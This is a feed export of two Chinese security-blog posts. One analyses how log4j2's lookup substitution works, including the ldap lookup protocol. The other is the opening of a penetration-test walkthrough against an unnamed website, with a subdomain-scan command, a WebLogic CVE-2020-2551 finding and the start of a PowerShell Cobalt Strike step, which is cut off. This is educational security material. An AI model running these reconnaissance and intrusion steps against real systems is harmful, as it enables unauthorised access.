<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">一個稱得上優秀的框架，必備的要素之一可以通過某種約定的格式讀取到所運行環境中的配置信息。本文中我們就來感受下log4j2實現此項功能時的精妙設計。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>一 概述</span><span></span></h2><blockquote data-tool="mdnice编辑器" style="border-top: none;border-right: none;border-bottom: none;font-size: 0.9em;overflow: auto;border-left-color: rgba(0, 0, 0, 0.4);background: rgba(0, 0, 0, 0.05);color: rgb(106, 115, 125);padding: 10px 10px 10px 20px;margin-bottom: 20px;margin-top: 20px;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;color: black;line-height: 26px;">“ Lookups provide a way to add values to the Log4j configuration at arbitrary places. They are a particular type of Plugin that implements the StrLookup interface. ”</p></blockquote><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">以上內容複製於log4j2的官方文檔lookup - Office Site。其清晰地說明了lookup的主要功能就是提供另外一種方式以添加某些特殊的值到日誌中，以最大化鬆散耦合地提供可配置屬性供使用者以約定的格式進行調用。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>二. 配置示例</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">以下列舉了兩個主要使用的位置；當然不僅僅如此，log4j2允許你在任何需要的地方使用約定格式來獲取環境中的指定配置信息。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9GTp04P7sKTf1hg5JGiagpAaxGTLRJlOkyDicMiaianCiapjh1ZsdUeWbarXY9kNoaW6qXibDAwY5b1mQcemI6Xclic6O/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">&lt;properties&gt;<br/>   &lt;!-- 之後我們就可以以 <span style="color: #d19a66;line-height: 26px;">${logPath}</span>來引用該屬性值  --&gt;<br/>  &lt;property name=<span style="color: #98c379;line-height: 26px;">&#34;logPath&#34;</span>&gt;<span style="color: #d19a66;line-height: 26px;">${sys:catalina.home}</span>/xmlogs&lt;/property&gt;<br/>&lt;/properties&gt;<br/>&lt;!-- 這裏的<span style="color: #d19a66;line-height: 26px;">${hostName}</span> 是由log4j2默認提供的, 其值爲程序所在的服務器的主機名 --&gt;<br/>&lt;!-- 至於<span style="color: #d19a66;line-height: 26px;">${thread:threadName}</span>, 將是本次我們所提供一個自定義lookup示例 --&gt;<br/>&lt;PatternLayout pattern=<span style="color: #98c379;line-height: 26px;">&#34;[<span style="color: #d19a66;line-height: 26px;">${hostName}</span>];[<span style="color: #d19a66;line-height: 26px;">${thread:threadName}</span>];[%X{user}];[$<span style="color: #d19a66;line-height: 26px;">${ctx:user}</span>];[$<span style="color: #d19a66;line-height: 26px;">${date:YYYY-MM/dd}</span>]&#34;</span> /&gt;<br/>关于log4j2的详细使用说明，请参看官网开发文档。<br/></code></pre><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>三. 分析</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们分析一下lookup机制，都会在什么地方级别的日志中出现。首先我们要了解一点日志等级，在log4j2中， 共有8个级别，按照从低到高为：ALL &lt; TRACE &lt; DEBUG &lt; INFO &lt; WARN &lt; ERROR &lt; FATAL &lt; OFF。</p><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">All:最低等级的，用于打开所有日志记录.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Trace:是追踪，就是程序推进一下.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Debug:指出细粒度信息事件对调试应用程序是非常有帮助的.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Info:消息在粗粒度级别上突出强调应用程序的运行过程.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Warn:输出警告及warn以下级别的日志.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Error:输出错误信息日志.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Fatal:输出每个严重的错误事件将会导致应用程序的退出的日志.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">All:最低等级的，用于打开所有日志记录.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Trace:是追踪，就是程序推进一下.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Debug:指出细粒度信息事件对调试应用程序是非常有帮助的.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Info:消息在粗粒度级别上突出强调应用程序的运行过程.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Warn:输出警告及warn以下级别的日志.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Error:输出错误信息日志.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Fatal:输出每个严重的错误事件将会导致应用程序的退出的日志.</section></li></ul><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">程序会打印高于或等于所设置级别的日志，设置的日志等级越高，打印出来的日志就越少 。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">详细代码可以看这里<img class="rich_pages wxw-img" data-ratio="0.20041972717733472" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1906" src="https://wechat2rss.xlab.app/img-proxy/?k=217035cd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFhC61wI8ibianticcE58oCtxjytnH6b09I5R4bkSfSHiaFr4GnSlmUVDo9wLujUMSdZ3vPBoXwlCHCcw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">也就是说，在不管什么级别的日志下都可以出发lookup。但是为什么有些级别的日志下却不可以触发呢？那是因为你的日志级别设置的太高，导致log4j根本就没打印日志内容。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在<code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">org.apache.logging.log4j.core.pattern.MessagePatternConverter#format</code>中，会按字符检测每条日志，一旦发现某条日志中包含<code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">$ {</code>，则触发替换机制，也就是将表达式内的内容替换成真实的内容，其中<code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">config.getStrSubstitutor().replace(event, value)</code>执行下一步替换操作，关键代码如图<img class="rich_pages wxw-img" data-ratio="0.30198019801980197" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1616" src="https://wechat2rss.xlab.app/img-proxy/?k=83529446&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFhC61wI8ibianticcE58oCtxj3b55LVM0jf7pgPNF5dN5tVxs8e4jnFxhOavxBaxaiaafiaWYv3a8SmicQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">org.apache.logging.log4j.core.lookup.StrSubstitutor#substitute(org.apache.logging.log4j.core.LogEvent, java.lang.StringBuilder, int, int, java.util.List&lt;java.lang.String&gt;)</code>中，其实就是一个简单的字符串提取，然后找到lookup的内容并替换。函数的文档如下<img class="rich_pages wxw-img" data-ratio="0.16544655929721816" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1366" src="https://wechat2rss.xlab.app/img-proxy/?k=de7db0c0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFhC61wI8ibianticcE58oCtxjPO0eaSnaL3OeN90kJOicongic6bibVeKLOlqCwAHqYOLh48B1G3MSvqNg%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.5366178428761651" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1502" src="https://wechat2rss.xlab.app/img-proxy/?k=721288fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFhC61wI8ibianticcE58oCtxjCHONKKkMxCx8iaYQicdHkUaCibLXq7hCjd3S5ibRZhcLVicQJUx1E452FCg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">没啥说的，一个简单的字符串查找函数，学过数据结构的都会，不详细介绍了。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在函数的这个地方，执行变量解析，如图</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.1634078212290503" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1432" src="https://wechat2rss.xlab.app/img-proxy/?k=0a11f630&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFhC61wI8ibianticcE58oCtxjqCuVBzln1ibDdtzWwr9O14iaKHpnibbydK1pGnbRveZ1OcSSrECyyaI0g%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在这个函数，执行查找，也就是根据变量的协议，关键代码+文档如图<img class="rich_pages wxw-img" data-ratio="0.5563139931740614" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1758" src="https://wechat2rss.xlab.app/img-proxy/?k=e719bac5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFhC61wI8ibianticcE58oCtxj3r9Zg6l6ib23FmX4IvLxrQhqD6ceOpaT5icP1LpDuAicAPaQq3JSl6Rpg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">剩下就是一个简单的字符串查找函数，从字符串中提取类似于url的结构去解析，关键代码如下</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.667063020214031" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1682" src="https://wechat2rss.xlab.app/img-proxy/?k=a8abf50c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFhC61wI8ibianticcE58oCtxjb7uoiczhVQFs6m58ic8gfLbwib83fP0KH0ZFXXq1JUERezwFZJINjNmAg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">值得注意的是，log4j2支持很多协议，例如通过ldap查找变量，通过docker查找变量，详细参考这里<a href="https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-lookups.html" target="_blank">https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-lookups.html</a></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">代码结构如图</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.34375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=2a38949a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdFhC61wI8ibianticcE58oCtxj61X3JZLSRpic8r9KkxK2ubFCmZJ0FiaDKhWiaKgkywmz5MQUhfM1ib7oGQ%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><br/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">由以上類層次結構圖可以看出</p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">log4j2提供不下十種獲取所運行環境配置信息的方式，基本能滿足實際運行環境中獲取各類配置信息的需求。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">我們在自定義lookup時，可以根據自身需求自由選擇繼承自StrLookup，AbstractLookup，AbstractConfigurationAwareLookup等等來簡化我們的代碼。以上默認提供的各類lookup，其取值來源看官可以通過下面給出的引用鏈接中的第二個進行詳細的瞭解，我就不再在這裏贅述一遍了。</section></li></ol><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">接下來我們來探索一些稍微深入的內容，以及一些細節性的內容。</p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">作爲lookup對外門面的Interpolator是通過 log4j2中負責解析<properties>節點的PropertiesPlugin類來併入執行流程中的。具體源碼可以參見PropertiesPlugin.configureSubstitutor方法。其中注意的是，我們在<properties>中提供的屬性是以default的優先級提供給外界的。</properties></properties></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">作爲lookup對外門面的Interpolator，在其構造函數中載入了所有category值爲StrLookup.CATEGORY的plugin【即包括log4j2內置的(“org.apache.logging.log4j.core” package下的），也包括用戶自定義的（log4j2.xml文件中的 Configuration.packages 屬性值指示的package下的）】。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Interpolator可以單獨使用，但某些值可能取不到。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">獲取MDC中的內容，log4j2提供了兩種方式：$${ctx:user}或%X{user}。</section></li></ol></section><p><br/></p>



<p><a href="2247485584">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9b51cd47&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485584%26idx%3D1%26sn%3D2fad11942986807ea7545f7b8b5d6af8%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 09 Dec 2021 23:50:00 +0800</pubDate>
    </item>
    <item>
      <title>记录某次实战渗透测试过程</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485568&amp;idx=1&amp;sn=80762499286b0f59c962ceb83c5d2fe3</link>
      <description>本文来自宽字节安全第一期线下培训学员Lemon投稿。第二期线下培训预计十一月底开班，欢迎咨询。号外宽字节第二</description>
      <content:encoded><![CDATA[<p>
原创 <span>Lemon</span> <span>2021-10-27 14:01</span> <span style="display: inline-block;"></span>
</p>

<p>本文来自宽字节安全第一期线下培训学员Lemon投稿。第二期线下培训预计十一月底开班，欢迎咨询。号外宽字节第二</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=fbfe6233&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnp4rUPOQxDt5mo0sTrKONsJtWHEw1xcicqGRH0p8micLaTOIAyhhqQ3EXg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><p data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;box-sizing: border-box;outline: none;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Arial, &#34;PingFang SC&#34;, &#34;Microsoft YaHei&#34;, &#34;WenQuanYi Micro Hei&#34;, sans-serif;text-align: left;white-space: normal;font-weight: bold;font-size: 22px;"><span style="text-decoration: underline;box-sizing: border-box;outline: 0px;max-width: 100%;overflow: scroll;font-size: 17px;line-height: 26px !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span data-raw-text="本" data-textnode-index="0" data-index="0" style="font-size: 17px;text-decoration: underline;outline: 0px;max-width: 100%;overflow: scroll;box-sizing: border-box !important;line-height: 26px !important;color: rgb(85, 85, 85) !important;overflow-wrap: break-word !important;">本文来自宽字节安全第一期线下培训学员Lemon</span></strong><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span data-raw-text="投" data-textnode-index="2" data-index="18" style="font-size: 17px;text-decoration: underline;outline: 0px;max-width: 100%;overflow: scroll;box-sizing: border-box !important;line-height: 26px !important;color: rgb(85, 85, 85) !important;overflow-wrap: break-word !important;">投稿。第二期线下培训预计十一月底开班，欢迎咨询。</span></strong></span></p><p style="white-space: normal;"><strong><span style="font-size: 24px;color: rgb(255, 0, 0);">号外</span></strong></p><p style="white-space: normal;"><br/></p><p style="white-space: normal;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485360&amp;idx=2&amp;sn=8c768c88229b7ffd62609cd600bc0224&amp;chksm=fa8b1a28cdfc933e11a5ebcaac646ec704a9314f052a1cf32a143d4a1eeaebc17fdc3616ae55&amp;scene=21#wechat_redirect" data-itemshowtype="0" tab="innerlink" data-linktype="2" wah-hotarea="click" style="color: rgb(255, 0, 0);transition: color 0.3s ease 0s;font-family: &#34;Helvetica Neue&#34;, Arial, &#34;PingFang SC&#34;, &#34;Microsoft YaHei&#34;, &#34;WenQuanYi Micro Hei&#34;, sans-serif;text-align: start;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;outline: 0px;max-width: 100%;overflow: scroll;font-size: 18px;box-sizing: border-box !important;line-height: 26px !important;overflow-wrap: break-word !important;"><span style="outline: 0px;max-width: 100%;overflow: scroll;box-sizing: border-box !important;line-height: 26px !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">宽字节第二期线下培训开始招生啦！！！</strong></span></a></p><p style="white-space: normal;"><br/></p><p style="white-space: normal;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485360&amp;idx=3&amp;sn=2fbb397c78aecce9738f3a96508da153&amp;chksm=fa8b1a28cdfc933e7fa5a420b8f23724892968655aa52818f6e8c5fb8c8ad55aa2ebaff8be1c&amp;scene=21#wechat_redirect" data-itemshowtype="0" tab="innerlink" data-linktype="2" wah-hotarea="click" style="color: rgb(255, 0, 0);transition: color 0.3s ease 0s;font-family: &#34;Helvetica Neue&#34;, Arial, &#34;PingFang SC&#34;, &#34;Microsoft YaHei&#34;, &#34;WenQuanYi Micro Hei&#34;, sans-serif;text-align: start;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;outline: 0px;max-width: 100%;overflow: scroll;font-size: 18px;box-sizing: border-box !important;line-height: 26px !important;overflow-wrap: break-word !important;"><span style="outline: 0px;max-width: 100%;overflow: scroll;box-sizing: border-box !important;line-height: 26px !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">宽字节首期内网渗透线上课开班啦！！！</strong></span></a></p><p style="white-space: normal;"><br/></p><p style="white-space: normal;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485360&amp;idx=4&amp;sn=be8a34c98d5d1b8e19b757c2f5357f37&amp;chksm=fa8b1a28cdfc933e30ba933e257325afd2df688605e4e3bc3ea6af6bce68785f235eaa0205a7&amp;scene=21#wechat_redirect" data-itemshowtype="0" tab="innerlink" data-linktype="2" wah-hotarea="click" style="color: rgb(255, 0, 0);transition: color 0.3s ease 0s;font-family: &#34;Helvetica Neue&#34;, Arial, &#34;PingFang SC&#34;, &#34;Microsoft YaHei&#34;, &#34;WenQuanYi Micro Hei&#34;, sans-serif;text-align: start;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;outline: 0px;max-width: 100%;overflow: scroll;box-sizing: border-box !important;line-height: 26px !important;overflow-wrap: break-word !important;"><span style="transition: color 0.3s ease 0s;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;outline: 0px;max-width: 100%;overflow: scroll;font-size: 18px;box-sizing: border-box !important;line-height: 26px !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">宽字节第二期JAVA安全进阶线上课开班啦！！！</strong></span></a></p><p style="white-space: normal;"><br/></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><br/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在某次项目中对某个网站的渗透测试，记录一下。<br/></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001868" data-ratio="0.524074074074074" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=fe97aba0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnp9LCvrykGibzb6MkCITKOiaXffRwXv698YfKYK7RUlExJmg8yEqPecqKQ%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">先做信息收集，使用oneforall收集一下子域名。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">python3 oneforall.py --target xxxxx run<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001867" data-ratio="0.4064814814814815" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=39feef65&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpo6zsuzQRVtEwVXqvowMXv2texG8sDsygy25voGQicHSxs5fNA2hkP1A%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在对上面的扫描结果逐一测试的时候，发现某子域名有weblogic漏洞</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001864" data-ratio="0.31666666666666665" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=2737112f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpWicvmVVTRKDBDGqia0icpXn50ibRs5vJwGDXIfwDD1f9eZxjvuNP7sMTqw%2F640%3Fwx_fmt%3Dpng"/></figure><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 18px;">通过weblogic漏洞利用工具扫描发现有CVE_2020_2551漏洞，管理员用户</h4><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001865" data-w="664" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.766566265060241" src="https://wechat2rss.xlab.app/img-proxy/?k=3edbbe0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpicwqyOOKPUEia3rdhtAakEy0pHqo1vGQZtPvjyia3S8u9zCLFCRibl2fzQ%2F640%3Fwx_fmt%3Dpng"/></figure><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 18px;">判断是否出网</h4><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">目标机器出网，并且能和VPS服务器通信</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001866" data-w="784" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.3979591836734694" src="https://wechat2rss.xlab.app/img-proxy/?k=e65e739d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpdicM2Gvey2rhCPPKptgUJex82tef5ibczn6KsvM9Qv82doiabPycC2hXA%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001869" data-w="759" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.21739130434782608" src="https://wechat2rss.xlab.app/img-proxy/?k=b5453d20&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnp47BzWXJaFMMxviaicuLUe0vgtRoDZRM5gEI0Bbb5ybe8gbJ6xQ0ib9tdQ%2F640%3Fwx_fmt%3Dpng"/></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;">cs上线</h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">执行poweshell看能不能上线</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, 